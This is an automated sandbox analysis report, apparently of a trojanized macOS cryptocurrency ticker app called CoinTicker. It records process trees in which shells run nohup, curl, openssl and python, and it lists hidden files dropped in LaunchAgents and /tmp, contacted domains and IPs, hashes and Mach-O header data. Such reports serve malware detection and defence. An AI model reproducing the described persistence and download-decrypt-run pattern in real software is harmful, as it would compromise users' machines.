      • bash (PID: 708 PPID: 705 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • launchctl (PID: 708 PPID: 705 Overlayed Process Image: bash MD5: 17fad4b994d600d0a5b6bc02b55c2c80)
    • bash (PID: 714 PPID: 694 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • bash (PID: 715 PPID: 714 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • launchctl (PID: 715 PPID: 714 Overlayed Process Image: bash MD5: 17fad4b994d600d0a5b6bc02b55c2c80)
      • bash (PID: 716 PPID: 714 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
      • grep (PID: 716 PPID: 714 Overlayed Process Image: bash MD5: 2b3efb273296881708ea2914c612e0eb)
    • bash (PID: 718 PPID: 694 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
    • sw_vers (PID: 718 PPID: 694 Overlayed Process Image: bash MD5: d33f7f9efd4158694d0d58879b54f89d)
    • bash (PID: 719 PPID: 694 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
    • bash (PID: 720 PPID: 694 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
    • bash (PID: 721 PPID: 694 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
  • xpcproxy (PID: 709 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • sh (PID: 709 PPID: 1 Overlayed Process Image: xpcproxy MD5: )
  • sh (PID: 709 PPID: 1 Overlayed Process Image: sh MD5: 8aa60b22a5d30418a002b340989384dc)
    • sh (PID: 710 PPID: 709 MD5: 8aa60b22a5d30418a002b340989384dc)
    • nohup (PID: 710 PPID: 709 Overlayed Process Image: sh MD5: 522dd81fe30aa08bbb8c92fff8254c34)
    • curl (PID: 710 PPID: 709 Overlayed Process Image: nohup MD5: 078cd73f58d3d8f875eed22522ff73f7)
    • sh (PID: 712 PPID: 709 MD5: 8aa60b22a5d30418a002b340989384dc)
    • openssl (PID: 712 PPID: 709 Overlayed Process Image: sh MD5: 701bcd74cc70ef798fe42ec4e002dac6)
    • sh (PID: 713 PPID: 709 MD5: 8aa60b22a5d30418a002b340989384dc)
    • python (PID: 713 PPID: 709 Overlayed Process Image: sh MD5: 2464fd41f7cf319d0e5c61a7643af77e)
    • Python (PID: 713 PPID: 709 Overlayed Process Image: python MD5: ba780ab677147d9db60c564ef3f51dd0)
  • xpcproxy (PID: 722 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • sh (PID: 722 PPID: 1 Overlayed Process Image: xpcproxy MD5: )
  • sh (PID: 722 PPID: 1 Overlayed Process Image: sh MD5: 8aa60b22a5d30418a002b340989384dc)
    • sh (PID: 723 PPID: 722 MD5: 8aa60b22a5d30418a002b340989384dc)
    • nohup (PID: 723 PPID: 722 Overlayed Process Image: sh MD5: 522dd81fe30aa08bbb8c92fff8254c34)
    • curl (PID: 723 PPID: 722 Overlayed Process Image: nohup MD5: 078cd73f58d3d8f875eed22522ff73f7)
    • sh (PID: 724 PPID: 722 MD5: 8aa60b22a5d30418a002b340989384dc)
    • openssl (PID: 724 PPID: 722 Overlayed Process Image: sh MD5: 701bcd74cc70ef798fe42ec4e002dac6)
    • sh (PID: 725 PPID: 722 MD5: 8aa60b22a5d30418a002b340989384dc)
    • python (PID: 725 PPID: 722 Overlayed Process Image: sh MD5: 2464fd41f7cf319d0e5c61a7643af77e)
    • Python (PID: 725 PPID: 722 Overlayed Process Image: python MD5: ba780ab677147d9db60c564ef3f51dd0)
  • xpcproxy (PID: 727 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • sh (PID: 727 PPID: 1 Overlayed Process Image: xpcproxy MD5: )
  • sh (PID: 727 PPID: 1 Overlayed Process Image: sh MD5: 8aa60b22a5d30418a002b340989384dc)
    • sh (PID: 728 PPID: 727 MD5: 8aa60b22a5d30418a002b340989384dc)
    • nohup (PID: 728 PPID: 727 Overlayed Process Image: sh MD5: 522dd81fe30aa08bbb8c92fff8254c34)
    • curl (PID: 728 PPID: 727 Overlayed Process Image: nohup MD5: 078cd73f58d3d8f875eed22522ff73f7)
    • sh (PID: 729 PPID: 727 MD5: 8aa60b22a5d30418a002b340989384dc)
    • openssl (PID: 729 PPID: 727 Overlayed Process Image: sh MD5: 701bcd74cc70ef798fe42ec4e002dac6)
    • sh (PID: 730 PPID: 727 MD5: 8aa60b22a5d30418a002b340989384dc)
    • python (PID: 730 PPID: 727 Overlayed Process Image: sh MD5: 2464fd41f7cf319d0e5c61a7643af77e)
    • Python (PID: 730 PPID: 727 Overlayed Process Image: python MD5: ba780ab677147d9db60c564ef3f51dd0)
  • xpcproxy (PID: 732 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • sh (PID: 732 PPID: 1 Overlayed Process Image: xpcproxy MD5: )
  • sh (PID: 732 PPID: 1 Overlayed Process Image: sh MD5: 8aa60b22a5d30418a002b340989384dc)
    • sh (PID: 733 PPID: 732 MD5: 8aa60b22a5d30418a002b340989384dc)
    • nohup (PID: 733 PPID: 732 Overlayed Process Image: sh MD5: 522dd81fe30aa08bbb8c92fff8254c34)
    • curl (PID: 733 PPID: 732 Overlayed Process Image: nohup MD5: 078cd73f58d3d8f875eed22522ff73f7)
    • sh (PID: 734 PPID: 732 MD5: 8aa60b22a5d30418a002b340989384dc)
    • openssl (PID: 734 PPID: 732 Overlayed Process Image: sh MD5: 701bcd74cc70ef798fe42ec4e002dac6)
    • sh (PID: 735 PPID: 732 MD5: 8aa60b22a5d30418a002b340989384dc)
    • python (PID: 735 PPID: 732 Overlayed Process Image: sh MD5: 2464fd41f7cf319d0e5c61a7643af77e)
    • Python (PID: 735 PPID: 732 Overlayed Process Image: python MD5: ba780ab677147d9db60c564ef3f51dd0)
  • cleanup

Created / dropped Files

/Users/henry/Documents/coins.plist
Process:/Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker
File Type:XML document text
Size (bytes):18141
Entropy (8bit):4.532458456503694
Encrypted:false
MD5:FA03749F1E326236EAE33B8552D20CC4
SHA1:C15AD56EED418007A2B2B3DF0B41DACAEB4B3739
SHA-256:FE5D80F89EFDBE88732CB7D0FDF69E7884A26FC5DE5074DD8FEF17A1F3E5B789
SHA-512:E2C497DFFD279A98103586F881DD7BA7C592743BC728BA35995A0EAA4F8F2C6D5A4E2BEA9470124030D2FBE83477531E2DAFC94C7282B461B88CC8E157D60D57
Malicious:false
Reputation:low
/Users/henry/Library/LaunchAgents/.dat.nosync02b6.gZkpeW
Process:/Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker
File Type:XML document text
Size (bytes):668
Entropy (8bit):5.221900960533256
Encrypted:false
MD5:296596354378CF11F74215FA37B206B9
SHA1:0FF048AFE43FA032222346BB44164C1CEB9019D1
SHA-256:D45CBAF501EC2C7B5F7182F5126AEF961BB268899C3EBAA211DC80F24D824051
SHA-512:1337EB13A8C61841A5B7064C1737A40154EA9320B04447C9BB235FD17068F836B2E40D854316C7DF74A8F2AFD82B65D8ACA654525A6DE795BA05E6BD3877A5C0
Malicious:false
Reputation:low
/dev/null
Process:/usr/bin/openssl
File Type:ASCII text
Size (bytes):17
Entropy (8bit):3.6168746059562227
Encrypted:false
MD5:53F845C42E60E49C81968B78E75B246D
SHA1:E50E9ABB65F88FC8B2F7C1CAAFB7AF018B81EF17
SHA-256:103FC57967B7B724493681288B8F1FCA07A9B160155D73356597C4B15185A68F
SHA-512:4DD7B73A40E18DA3EA802696B8F4D849A7ED6C6D51284C501B298A1AB5CDAAEFA1B01A7AA6A6A59C2E62AB0D346AA7201494FAA4B79CD71453508C907FC6B025
Malicious:false
Reputation:low
/private/tmp/.info.enc
Process:/usr/bin/curl
File Type:HTML document text
Size (bytes):129202
Entropy (8bit):6.079167593804571
Encrypted:false
MD5:265CD8EB87B9D6C9F6E2A4D878FEC5AE
SHA1:22161F554E043BD3FFEF5FE1DA38C5831225D310
SHA-256:872EA10AF95D1F352824FCB564994A2702F776110E62CAA581E6F0172DCB8E51
SHA-512:E058D41D8B0A1F4A2F23D54B000A3AED8085ABCE3C542D98643B14D2551CAB8D82AB7E442A6BD930235943D9BCA78486C4294FD428687ED5E12A2124A00A0FF0
Malicious:false
Reputation:low
/private/var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/C/com.coins.CoinTicker/com.apple.metal/Intel HD Graphics 4000/functions.maps
Process:/Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker
File Type:data
Size (bytes):2048
Entropy (8bit):1.3445272072293486
Encrypted:false
MD5:21D56B703521951512C6169EF24EF765
SHA1:4D6F6A8FD2AB28EAF06CC093814BA8D77B8AD441
SHA-256:1E901E8436560A79BA372140CD5FC889F5CF1A327093A673F93724855BF0ED34
SHA-512:4D539105487A843119029F6C01F8EDF7C470B1A5CAE702282DFC4D30E77E1311112CF9AD05BA67328BC202FBE53793B1A386D3A9544B88EA3E1545C7238106A9
Malicious:false
Reputation:low
/private/var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/C/com.coins.CoinTicker/com.apple.metal/libraries.maps
Process:/Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker
File Type:data
Size (bytes):1024
Entropy (8bit):1.0668459310990104
Encrypted:false
MD5:551E3291709023D32DA55D13BD28AF90
SHA1:BC5026B2D2E79B8895B849A3B3B6B674E17A88BB
SHA-256:8F4BE081B3B78162FC9C721B38770EF507A498D34796C9A3E8E4B052AD150406
SHA-512:96F2963D665162832F57BC07D9F13D1D9D6A4251E5C140DD917E8F89F516FDF6586E427AD42544656F7F05C1784772AA2A153A852CA7D98B2DB61C1CEF764602
Malicious:false
Reputation:low
/private/var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/C/mds/mdsDirectory.db_
Process:/Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker
File Type:Mac OS X Keychain File
Size (bytes):48908
Entropy (8bit):3.533948990143748
Encrypted:false
MD5:09070E01FA6ED1973D94FAD50C35E3ED
SHA1:7546663E66F9889EE3365A7A0BE372300C6022CA
SHA-256:2E6EC437A97DD88F9067B2E99AC64789670D9B9C1FC50B2856E392E66163211F
SHA-512:621399FF832F1A8352E5E9A54984B878C7D3432156D9CF9986A1A5B75662E92D9A00FA1BA6714D679286BB49E71916F72655AADA2B99880A2806FAFC6F86E7F3
Malicious:false
Reputation:low
/private/var/folders/4x/3w8zrtrd7m1f065ysgs32sn40000gn/C/mds/mdsObject.db_
Process:/Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker
File Type:Mac OS X Keychain File
Size (bytes):4404
Entropy (8bit):3.5113078915037033
Encrypted:false
MD5:D487F899A14AE98519B46D51BC810F1B
SHA1:64877ECFBE47ED66EED545B2449BBE8B22B775D0
SHA-256:4835899C464487946E281D535381D4CAB8BC90EC08CD00A6A0ECB97854E9321D
SHA-512:EB4FABD61B4FD2B9EF3C9E93793CA5F11353A1F81EA4DA22E0F79ED45D89180B77469B9E5DCD5350AE650B31DE9018743DA7716EFA7B5CDDFC3FA7A13C476F40
Malicious:false
Reputation:low

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
github.map.fastly.net151.101.0.133truefalseunknown
github.com192.30.253.112truefalsehigh
api.manana.kr133.130.107.154truefalseunknown
poloniex.com104.20.13.48truefalsehigh
a279.dscq.akamai.net23.10.249.146truefalsehigh
a771.dscq.akamai.net23.10.249.171truefalsehigh
appleservices.infounknownunknownfalseunknown
raw.githubusercontent.comunknownunknownfalseunknown
ocsp.int-x3.letsencrypt.orgunknownunknownfalsehigh

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://ocsp.int-x3.letsencrypt.org/MFgwVqADAgEAME8wTTBLMAkGBSsOAwIaBQAEFH7maudymrP8%2BKIgZGwWoS1gcQhdBBSoSmpjBH3duubRObemRWXv86jsoQISBEPFo0kDZ%2BqvsHbeCoThsluIfalse
    high

    Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public

    IPCountryFlagASNASN NameMalicious
    133.130.107.154Japan7506INTERQGMOInternetIncJPfalse
    192.30.253.112United States
    36459GITHUB-GitHubIncUSfalse
    151.101.0.133United States
    54113FASTLY-FastlyUSfalse
    185.206.144.226Bulgaria
    44901BELCLOUDBGtrue
    23.10.249.171United States
    20940AKAMAI-ASN1USfalse
    192.30.253.113United States
    36459GITHUB-GitHubIncUSfalse
    17.252.92.75United States
    714APPLE-ENGINEERING-AppleIncUSfalse
    104.20.13.48United States
    13335CLOUDFLARENET-CloudFlareIncUSfalse
    17.188.165.205United States
    714APPLE-ENGINEERING-AppleIncUSfalse
    104.20.12.48United States
    13335CLOUDFLARENET-CloudFlareIncUSfalse

    Static File Info

    General

    File type:Zip archive data, at least v1.0 to extract
    Entropy (8bit):7.995880449329996
    TrID:
    • Mac OS X Application Bundle (12004/1) 68.54%
    • ZIP compressed archive (4004/1) 22.86%
    • Java Script embedded in Visual Basic Script (1500/0) 8.56%
    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
    File name:xqnTwFKnuR.app
    File size:4826263
    MD5:6e90da7669304722c9a06db0e32554ef
    SHA1:a93b7d87c66506a2bc7e52b57e8900c5d445d827
    SHA256:f4f45e16dd276b948dedd8a5f8d55c9e1e60884b9fe00143cb092eed693cddc4
    SHA512:4e9e2d0753b2f794ffdb474732209a8108a8998df04b08a64d0984b1d09a261fd00fe8ecf213f28cf5cf6c967a1963de0892efd504f44c4fc45c3762d78da07d
    File Content Preview:PK........8.QM................CoinTicker.app/UX...+.[L*.[....PK........8.QM................CoinTicker.app/Contents/UX...+.[L*.[....PK........8.QM............'...CoinTicker.app/Contents/_CodeSignature/UX..~+.[L*.[....PK........b.QM............4...CoinTicke

    Static App Info

    General Informations

    Package Info:
    Property List File:<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0"><dict><key>ATSApplicationFontsPath</key><string>Fonts/</string><key>BuildMachineOSBuild</key><string>17E199</string><key>CFBundleDevelopmentRegion</key><string>en</string><key>CFBundleExecutable</key><string>CoinTicker</string><key>CFBundleIconFile</key><string>AppIcon</string><key>CFBundleIconName</key><string>AppIcon</string><key>CFBundleIdentifier</key><string>com.coins.CoinTicker</string><key>CFBundleInfoDictionaryVersion</key><string>6.0</string><key>CFBundleName</key><string>CoinTicker</string><key>CFBundlePackageType</key><string>APPL</string><key>CFBundleShortVersionString</key><string>3.2.0</string><key>CFBundleSupportedPlatforms</key><array><string>MacOSX</string></array><key>CFBundleVersion</key><string>321</string><key>DTCompiler</key><string>com.apple.compilers.llvm.clang.1_0</string><key>DTPlatformBuild</key><string>9E145</string><key>DTPlatformVersion</key><string>GM</string><key>DTSDKBuild</key><string>17E189</string><key>DTSDKName</key><string>macosx10.13</string><key>DTXcode</key><string>0930</string><key>DTXcodeBuild</key><string>9E145</string><key>LSApplicationCategoryType</key><string>public.app-category.finance</string><key>LSMinimumSystemVersion</key><string>10.10</string><key>LSUIElement</key><true/><key>NSAppTransportSecurity</key><dict><key>NSAllowsArbitraryLoads</key><true/></dict><key>NSHumanReadableCopyright</key><string>Copyright 2018 Coin. All rights reserved.</string><key>NSMainNibFile</key><string>MainMenu</string><key>NSPrincipalClass</key><string>NSApplication</string><key>UIAppFonts</key><array><string>cryptocoins-icons.ttf</string></array></dict></plist>

    Frameworks

    NameType
    libswiftAppKit.dylibMach-O 64-bit dynamically linked shared library
    libswiftCore.dylibMach-O 64-bit dynamically linked shared library
    libswiftCoreData.dylibMach-O 64-bit dynamically linked shared library
    libswiftCoreFoundation.dylibMach-O 64-bit dynamically linked shared library
    libswiftCoreGraphics.dylibMach-O 64-bit dynamically linked shared library
    libswiftCoreImage.dylibMach-O 64-bit dynamically linked shared library
    libswiftDarwin.dylibMach-O 64-bit dynamically linked shared library
    libswiftDispatch.dylibMach-O 64-bit dynamically linked shared library
    libswiftFoundation.dylibMach-O 64-bit dynamically linked shared library
    libswiftIOKit.dylibMach-O 64-bit dynamically linked shared library
    libswiftMetal.dylibMach-O 64-bit dynamically linked shared library
    libswiftObjectiveC.dylibMach-O 64-bit dynamically linked shared library
    libswiftos.dylibMach-O 64-bit dynamically linked shared library
    libswiftQuartzCore.dylibMach-O 64-bit dynamically linked shared library
    libswiftXPC.dylibMach-O 64-bit dynamically linked shared library

    Resources

    NameType
    Info.plistXML document text
    PkgInfoASCII text, with no line terminators
    libswiftAppKit.dylibMach-O 64-bit dynamically linked shared library
    libswiftCore.dylibMach-O 64-bit dynamically linked shared library
    libswiftCoreData.dylibMach-O 64-bit dynamically linked shared library
    libswiftCoreFoundation.dylibMach-O 64-bit dynamically linked shared library
    libswiftCoreGraphics.dylibMach-O 64-bit dynamically linked shared library
    libswiftCoreImage.dylibMach-O 64-bit dynamically linked shared library
    libswiftDarwin.dylibMach-O 64-bit dynamically linked shared library
    libswiftDispatch.dylibMach-O 64-bit dynamically linked shared library
    libswiftFoundation.dylibMach-O 64-bit dynamically linked shared library
    libswiftIOKit.dylibMach-O 64-bit dynamically linked shared library
    libswiftMetal.dylibMach-O 64-bit dynamically linked shared library
    libswiftObjectiveC.dylibMach-O 64-bit dynamically linked shared library
    libswiftos.dylibMach-O 64-bit dynamically linked shared library
    libswiftQuartzCore.dylibMach-O 64-bit dynamically linked shared library
    libswiftXPC.dylibMach-O 64-bit dynamically linked shared library
    CoinTickerMach-O 64-bit executable
    AppIcon.icnsdata
    Assets.carMac OS X bill of materials (BOM) file
    coins.plistXML document text
    MainMenu.nibApple binary property list
    Localizable.stringsLittle-endian UTF-16 Unicode C program text
    cryptocoins-icons.ttfTrueType font data
    Localizable.stringsLittle-endian UTF-16 Unicode C program text
    Localizable.stringsLittle-endian UTF-16 Unicode C program text
    CodeResourcesXML document text
    Info.plistXML document text
    PkgInfoASCII text, with no line terminators
    libswiftAppKit.dylibMach-O 64-bit dynamically linked shared library
    libswiftCore.dylibMach-O 64-bit dynamically linked shared library
    libswiftCoreData.dylibMach-O 64-bit dynamically linked shared library
    libswiftCoreFoundation.dylibMach-O 64-bit dynamically linked shared library
    libswiftCoreGraphics.dylibMach-O 64-bit dynamically linked shared library
    libswiftCoreImage.dylibMach-O 64-bit dynamically linked shared library
    libswiftDarwin.dylibMach-O 64-bit dynamically linked shared library
    libswiftDispatch.dylibMach-O 64-bit dynamically linked shared library
    libswiftFoundation.dylibMach-O 64-bit dynamically linked shared library
    libswiftIOKit.dylibMach-O 64-bit dynamically linked shared library
    libswiftMetal.dylibMach-O 64-bit dynamically linked shared library
    libswiftObjectiveC.dylibMach-O 64-bit dynamically linked shared library
    libswiftos.dylibMach-O 64-bit dynamically linked shared library
    libswiftQuartzCore.dylibMach-O 64-bit dynamically linked shared library
    libswiftXPC.dylibMach-O 64-bit dynamically linked shared library
    CoinTickerMach-O 64-bit executable
    AppIcon.icnsdata
    Assets.carMac OS X bill of materials (BOM) file
    coins.plistXML document text
    MainMenu.nibApple binary property list
    Localizable.stringsLittle-endian UTF-16 Unicode C program text
    cryptocoins-icons.ttfTrueType font data
    Localizable.stringsLittle-endian UTF-16 Unicode C program text
    Localizable.stringsLittle-endian UTF-16 Unicode C program text
    CodeResourcesXML document text

    Static Mach Info

    General Informations for header0

    Endian:<
    Size:64-bit
    Architecture:x86_64
    Filetype:execute
    Nbr. of load commands:37
    segment_command_64
    NameValue
    segname__PAGEZERO
    fileoff0
    maxprot0
    vmsize4294967296
    nsects0
    flags0
    filesize0
    vmaddr0
    initprot0
    segment_command_64
    NameValue
    segname__TEXT
    fileoff0
    maxprot7
    vmsize409600
    nsects17
    flags0
    filesize409600
    vmaddr4294967296
    initprot5
    Datassectname__text
    segname__TEXT
    reloff0
    addr4294975216
    align4
    nreloc0
    flags2147484672
    offset7920
    reserved20
    reserved10
    reserved30
    size363156
    sectname__stubs
    segname__TEXT
    reloff0
    addr4295338372
    align1
    nreloc0
    flags2147484680
    offset371076
    reserved26
    reserved10
    reserved30
    size1218
    sectname__stub_helper
    segname__TEXT
    reloff0
    addr4295339592
    align2
    nreloc0
    flags2147484672
    offset372296
    reserved20
    reserved10
    reserved30
    size2046
    sectname__const
    segname__TEXT
    reloff0
    addr4295341648
    align4
    nreloc0
    flags0
    offset374352
    reserved20
    reserved10
    reserved30
    size3464
    sectname__cstring
    segname__TEXT
    reloff0
    addr4295345120
    align4
    nreloc0
    flags2
    offset377824
    reserved20
    reserved10
    reserved30
    size13277
    sectname__objc_methname
    segname__TEXT
    reloff0
    addr4295358397
    align0
    nreloc0
    flags2
    offset391101
    reserved20
    reserved10
    reserved30
    size9883
    sectname__swift3_typeref
    segname__TEXT
    reloff0
    addr4295368288
    align4
    nreloc0
    flags0
    offset400992
    reserved20
    reserved10
    reserved30
    size1831
    sectname__swift3_reflstr
    segname__TEXT
    reloff0
    addr4295370128
    align4
    nreloc0
    flags0
    offset402832
    reserved20
    reserved10
    reserved30
    size643
    sectname__swift3_fieldmd
    segname__TEXT
    reloff0
    addr4295370772
    align2
    nreloc0
    flags0
    offset403476
    reserved20
    reserved10
    reserved30
    size1112
    sectname__swift3_capture
    segname__TEXT
    reloff0
    addr4295371884
    align2
    nreloc0
    flags0
    offset404588
    reserved20
    reserved10
    reserved30
    size436
    sectname__swift3_assocty
    segname__TEXT
    reloff0
    addr4295372320
    align2
    nreloc0
    flags0
    offset405024
    reserved20
    reserved10
    reserved30
    size336
    sectname__swift2_proto
    segname__TEXT
    reloff0
    addr4295372656
    align3
    nreloc0
    flags0
    offset405360
    reserved20
    reserved10
    reserved30
    size352
    sectname__swift3_builtin
    segname__TEXT
    reloff0
    addr4295373008
    align2
    nreloc0
    flags0
    offset405712
    reserved20
    reserved10
    reserved30
    size40
    sectname__objc_classname
    segname__TEXT
    reloff0
    addr4295373048
    align0
    nreloc0
    flags2
    offset405752
    reserved20
    reserved10
    reserved30
    size72
    sectname__objc_methtype
    segname__TEXT
    reloff0
    addr4295373120
    align0
    nreloc0
    flags2
    offset405824
    reserved20
    reserved10
    reserved30
    size54
    sectname__unwind_info
    segname__TEXT
    reloff0
    addr4295373176
    align2
    nreloc0
    flags0
    offset405880
    reserved20
    reserved10
    reserved30
    size2028
    sectname__eh_frame
    segname__TEXT
    reloff0
    addr4295375208
    align3
    nreloc0
    flags0
    offset407912
    reserved20
    reserved10
    reserved30
    size1680
    segment_command_64
    NameValue
    segname__DATA
    fileoff409600
    maxprot7
    vmsize28672
    nsects16
    flags0
    filesize24576
    vmaddr4295376896
    initprot3
    Datassectname__nl_symbol_ptr
    segname__DATA
    reloff0
    addr4295376896
    align3
    nreloc0
    flags6
    offset409600
    reserved20
    reserved1203
    reserved30
    size16
    sectname__got
    segname__DATA
    reloff0
    addr4295376912
    align3
    nreloc0
    flags6
    offset409616
    reserved20
    reserved1205
    reserved30
    size688
    sectname__la_symbol_ptr
    segname__DATA
    reloff0
    addr4295377600
    align3
    nreloc0
    flags7
    offset410304
    reserved20
    reserved1291
    reserved30
    size1624
    sectname__const
    segname__DATA
    reloff0
    addr4295379224
    align3
    nreloc0
    flags0
    offset411928
    reserved20
    reserved10
    reserved30
    size2136
    sectname__objc_classlist
    segname__DATA
    reloff0
    addr4295381360
    align3
    nreloc0
    flags268435456
    offset414064
    reserved20
    reserved10
    reserved30
    size24
    sectname__objc_nlclslist
    segname__DATA
    reloff0
    addr4295381384
    align3
    nreloc0
    flags268435456
    offset414088
    reserved20
    reserved10
    reserved30
    size8
    sectname__objc_catlist
    segname__DATA
    reloff0
    addr4295381392
    align3
    nreloc0
    flags268435456
    offset414096
    reserved20
    reserved10
    reserved30
    size16
    sectname__objc_protolist
    segname__DATA
    reloff0
    addr4295381408
    align3
    nreloc0
    flags0
    offset414112
    reserved20
    reserved10
    reserved30
    size88
    sectname__objc_imageinfo
    segname__DATA
    reloff0
    addr4295381496
    align2
    nreloc0
    flags0
    offset414200
    reserved20
    reserved10
    reserved30
    size8
    sectname__objc_const
    segname__DATA
    reloff0
    addr4295381504
    align3
    nreloc0
    flags0
    offset414208
    reserved20
    reserved10
    reserved30
    size12144
    sectname__objc_selrefs
    segname__DATA
    reloff0
    addr4295393648
    align3
    nreloc0
    flags268435461
    offset426352
    reserved20
    reserved10
    reserved30
    size1904
    sectname__objc_protorefs
    segname__DATA
    reloff0
    addr4295395552
    align3
    nreloc0
    flags0
    offset428256
    reserved20
    reserved10
    reserved30
    size88
    sectname__objc_classrefs
    segname__DATA
    reloff0
    addr4295395640
    align3
    nreloc0
    flags268435456
    offset428344
    reserved20
    reserved10
    reserved30
    size416
    sectname__objc_data
    segname__DATA
    reloff0
    addr4295396056
    align3
    nreloc0
    flags0
    offset428760
    reserved20
    reserved10
    reserved30
    size1976
    sectname__data
    segname__DATA
    reloff0
    addr4295398032
    align3
    nreloc0
    flags0
    offset430736
    reserved20
    reserved10
    reserved30
    size3128
    sectname__bss
    segname__DATA
    reloff0
    addr4295401168
    align4
    nreloc0
    flags1
    offset0
    reserved20
    reserved10
    reserved30
    size768
    segment_command_64
    NameValue
    segname__LINKEDIT
    fileoff434176
    maxprot7
    vmsize57344
    nsects0
    flags0
    filesize54496
    vmaddr4295405568
    initprot1
    dyld_info_command
    NameValue
    lazy_bind_size10032
    lazy_bind_off440680
    weak_bind_size0
    rebase_size792
    export_off450712
    export_size48
    bind_off434968
    rebase_off434176
    bind_size5712
    weak_bind_off0
    symtab_command
    NameValue
    strsize13032
    symoff451888
    stroff459640
    nsyms361
    dysymtab_command
    NameValue
    extreloff0
    nlocrel0
    indirectsymoff457664
    modtaboff0
    nextrel0
    iundefsym2
    nmodtab0
    ilocalsym0
    nundefsym359
    nextrefsyms0
    locreloff0
    ntoc0
    nlocalsym1
    tocoff0
    extrefsymoff0
    nindirectsyms494
    iextdefsym1
    nextdefsym1
    dylinker_command
    NameValue
    name12
    Data/usr/lib/dyld
    uuid_command
    NameValue
    uuidf284907e9cf038a8b5fd0acd2c92c7a9
    version_min_command
    NameValue
    version657920
    reserved658688
    source_version_command
    NameValue
    version0
    entry_point_command
    NameValue
    stacksize0
    entryoff125312
    dylib_command
    NameValue
    compatibility_version0.44.1
    timestampThu Jan 01 01:00:02 1970
    name24
    current_version5888.172.5
    Data/System/Library/Frameworks/Foundation.framework/Versions/C/Foundation
    dylib_command
    NameValue
    compatibility_version0.1.0
    timestampThu Jan 01 01:00:02 1970
    name24
    current_version0.228.0
    Data/usr/lib/libobjc.A.dylib
    dylib_command
    NameValue
    compatibility_version0.1.0
    timestampThu Jan 01 01:00:02 1970
    name24
    current_version12804.228.4
    Data/usr/lib/libSystem.B.dylib
    dylib_command
    NameValue
    compatibility_version0.45.0
    timestampThu Jan 01 01:00:02 1970
    name24
    current_version10352.25.6
    Data/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit
    dylib_command
    NameValue
    compatibility_version0.150.0
    timestampThu Jan 01 01:00:02 1970
    name24
    current_version5888.172.5
    Data/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
    dylib_command
    NameValue
    compatibility_version0.1.0
    timestampThu Jan 01 01:00:02 1970
    name24
    current_version12876.181.4
    Data/System/Library/Frameworks/ServiceManagement.framework/Versions/A/ServiceManagement
    dylib_command
    NameValue
    compatibility_version0.1.0
    timestampThu Jan 01 01:00:02 1970
    name24
    current_version0.123.1
    Data/System/Library/Frameworks/StoreKit.framework/Versions/A/StoreKit
    dylib_command
    NameValue
    compatibility_version0.1.0
    timestampThu Jan 01 01:00:02 1970
    name24
    current_version48.134.3
    Data@rpath/libswiftAppKit.dylib
    dylib_command
    NameValue
    compatibility_version0.1.0
    timestampThu Jan 01 01:00:02 1970
    name24
    current_version48.134.3
    Data@rpath/libswiftCore.dylib
    dylib_command
    NameValue
    compatibility_version0.1.0
    timestampThu Jan 01 01:00:02 1970
    name24
    current_version48.134.3
    Data@rpath/libswiftCoreData.dylib
    dylib_command
    NameValue
    compatibility_version0.1.0
    timestampThu Jan 01 01:00:02 1970
    name24
    current_version48.134.3
    Data@rpath/libswiftCoreFoundation.dylib
    dylib_command
    NameValue
    compatibility_version0.1.0
    timestampThu Jan 01 01:00:02 1970
    name24
    current_version48.134.3
    Data@rpath/libswiftCoreGraphics.dylib
    dylib_command
    NameValue
    compatibility_version0.1.0
    timestampThu Jan 01 01:00:02 1970
    name24
    current_version48.134.3
    Data@rpath/libswiftCoreImage.dylib
    dylib_command
    NameValue
    compatibility_version0.1.0
    timestampThu Jan 01 01:00:02 1970
    name24
    current_version48.134.3
    Data@rpath/libswiftDarwin.dylib
    dylib_command
    NameValue
    compatibility_version0.1.0
    timestampThu Jan 01 01:00:02 1970
    name24
    current_version48.134.3
    Data@rpath/libswiftDispatch.dylib
    dylib_command
    NameValue
    compatibility_version0.1.0
    timestampThu Jan 01 01:00:02 1970
    name24
    current_version48.134.3
    Data@rpath/libswiftFoundation.dylib
    dylib_command
    NameValue
    compatibility_version0.1.0
    timestampThu Jan 01 01:00:02 1970
    name24
    current_version48.134.3
    Data@rpath/libswiftIOKit.dylib
    dylib_command
    NameValue
    compatibility_version0.1.0
    timestampThu Jan 01 01:00:02 1970
    name24
    current_version48.134.3
    Data@rpath/libswiftMetal.dylib
    dylib_command
    NameValue
    compatibility_version0.1.0
    timestampThu Jan 01 01:00:02 1970
    name24
    current_version48.134.3
    Data@rpath/libswiftObjectiveC.dylib
    dylib_command
    NameValue
    compatibility_version0.1.0
    timestampThu Jan 01 01:00:02 1970
    name24
    current_version48.134.3
